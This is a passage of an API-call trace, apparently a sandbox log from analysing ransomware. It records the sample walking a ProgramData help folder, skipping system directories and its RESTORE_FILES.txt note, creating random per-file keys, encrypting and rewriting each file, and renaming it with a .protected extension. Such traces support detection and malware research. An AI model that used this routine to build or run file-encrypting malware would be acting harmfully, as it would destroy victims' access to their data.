Files") returned -1 [0072.482] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.482] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.482] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.482] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\.") returned 35 [0072.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.482] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.483] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.483] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.483] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.483] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.483] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.483] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\..") returned 36 [0072.483] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.483] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.483] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="Windows") returned -1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="Program Files") returned -1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="Program Files (x86)") returned -1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="$Recycle.bin") returned 1 [0072.484] lstrcmpiW (lpString1="Hx.hxn", lpString2="System Volume Information") returned -1 [0072.484] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrIW (lpFirst="Hx.hxn", 
lpSrch=".protected") returned 0x0 [0072.484] lstrcmpW (lpString1="Hx.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrW (lpFirst="Hx.hxn", lpSrch=".txt") returned 0x0 [0072.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrW (lpFirst="Hx.hxn", lpSrch=".rar") returned 0x0 [0072.484] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned 40 [0072.484] StrStrW (lpFirst="Hx.hxn", lpSrch=".zip") returned 0x0 [0072.484] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x186, lpOverlapped=0x0) returned 1 [0072.485] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.485] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x186, lpOverlapped=0x0) returned 1 [0072.485] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.485] 
WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.485] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.485] CloseHandle (hObject=0xa4) returned 1 [0072.486] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.protected") returned 50 [0072.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.protected")) returned 1 [0072.486] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="Windows") returned -1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="Program Files") returned -1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.486] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.486] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.486] StrStrIW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.486] lstrcmpW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.486] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | 
out: pbBuffer=0x295f39c) returned 1 [0072.486] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.486] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.487] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.487] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.487] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.487] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.487] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 54 [0072.487] StrStrW (lpFirst="MS.EXCEL.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.487] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.488] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.488] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.488] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.489] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.489] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.489] CloseHandle (hObject=0xa4) returned 1 [0072.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.protected") returned 64 [0072.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.protected")) returned 1 [0072.490] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.491] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.491] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrIW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.491] lstrcmpW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.491] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.491] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.491] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.491] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.491] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 58 [0072.491] StrStrW (lpFirst="MS.EXCEL.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.491] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.496] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.496] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.497] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.497] WriteFile (in: hFile=0xa4, 
lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.497] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.497] CloseHandle (hObject=0xa4) returned 1 [0072.498] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.protected") returned 68 [0072.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn.protected")) returned 1 [0072.498] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="Windows") returned -1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="Program Files") returned -1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.498] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.498] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.498] StrStrIW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.498] lstrcmpW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.498] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.500] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.500] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.500] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.500] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.500] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 54 [0072.500] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.500] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.503] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.503] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.504] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.504] WriteFile (in: 
hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.504] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.504] CloseHandle (hObject=0xa4) returned 1 [0072.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.protected") returned 64 [0072.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn.protected")) returned 1 [0072.505] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="Windows") returned -1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="Program Files") returned -1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.505] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.505] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrIW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.505] lstrcmpW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.505] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.505] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0072.505] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.505] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.506] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.506] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.507] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.507] WriteFile (in: 
hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.507] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.507] CloseHandle (hObject=0xa4) returned 1 [0072.507] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.protected") returned 65 [0072.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.GROOVE.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.groove.14.1033.hxn.protected")) returned 1 [0072.508] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="Windows") returned -1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="Program Files") returned -1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.508] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.508] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.508] StrStrIW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.508] lstrcmpW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned 
-1 [0072.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.510] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.510] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.510] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.510] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.510] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0072.510] StrStrW (lpFirst="MS.INFOPATH.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.510] ReadFile (in: hFile=0xa4, lpBuffer=0x49cc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesRead=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.511] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.511] WriteFile (in: hFile=0xa4, lpBuffer=0x49cc48*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49cc48*, lpNumberOfBytesWritten=0x295f3e4*=0x158, lpOverlapped=0x0) returned 1 [0072.512] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
